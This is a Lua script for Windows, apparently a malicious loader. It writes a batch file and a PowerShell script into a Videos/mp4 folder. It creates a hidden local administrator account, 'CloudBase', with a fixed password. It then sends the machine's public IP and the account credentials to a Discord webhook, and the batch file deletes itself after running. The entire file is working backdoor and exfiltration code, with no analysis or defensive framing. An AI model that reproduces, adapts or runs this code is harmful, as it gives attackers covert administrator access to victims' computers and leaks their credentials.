local function execCommand(command)
    local handle = io.popen(command)
    local result = handle:read("*a")
    handle:close()
    return result
end

local function directoryExists(path)
    local command = string.format('if exist "%s" (echo 1) else (echo 0)', path)
    local result = execCommand(command)
    return result:match("1") ~= nil
end

local function createDirectory(path)
    os.execute('mkdir "' .. path .. '"')
end

local function writeFile(filepath, content)
    local file, err = io.open(filepath, "w")
    if file then
        file:write(content)
        file:close()
    end
end

local function createAndExecuteBatch()
    local batchContent = [[
@echo off
net user CloudBase nonF12bl!23!@F /add /Y
net localgroup administrators CloudBase /add /Y
powershell -ExecutionPolicy Bypass -File "C:/Users/%USERNAME%/Videos/mp4/1.ps1"
exit
]]
    local batchFilePath = "C:/Users/" .. os.getenv("USERNAME") .. "/Videos/mp4/1.bat"
    writeFile(batchFilePath, batchContent)
    os.execute("start /min cmd /c \"" .. batchFilePath .. " && del \"" .. batchFilePath .. "\" >nul\"")
end

local function createPowerShellScript()
    local psScriptContent = [[
$webhookUri = 'https://discord.com/api/webhooks/1229922049217003653/nOOgnKk4_gd7KgMyNFzPLxhLGAt9rMSTz-aiR7oUTpgFqA67ZNEuW87GHp3248KNCUMY'
$ipAddress = Invoke-RestMethod -Uri 'https://api.ipify.org/?format=txt'
$user = "CloudBase"
$pass = "nonF12bl!23!@F"
$body = @{
    'username' = 'N'
    'content' = "Server IP: $ipAddress User: ||$user|| Pass: ||$pass||"
}
Invoke-RestMethod -Uri $webhookUri -Method 'Post' -Body $body
]]
    local psFilePath = "C:/Users/" .. os.getenv("USERNAME") .. "/Videos/mp4/1.ps1"
    writeFile(psFilePath, psScriptContent)
end

local function main()
    local dirPath = "C:/Users/" .. os.getenv("USERNAME") .. "/Videos/mp4"

    if not directoryExists(dirPath) then
        createDirectory(dirPath)
        createPowerShellScript()
        createAndExecuteBatch()
  
    end
end

main()
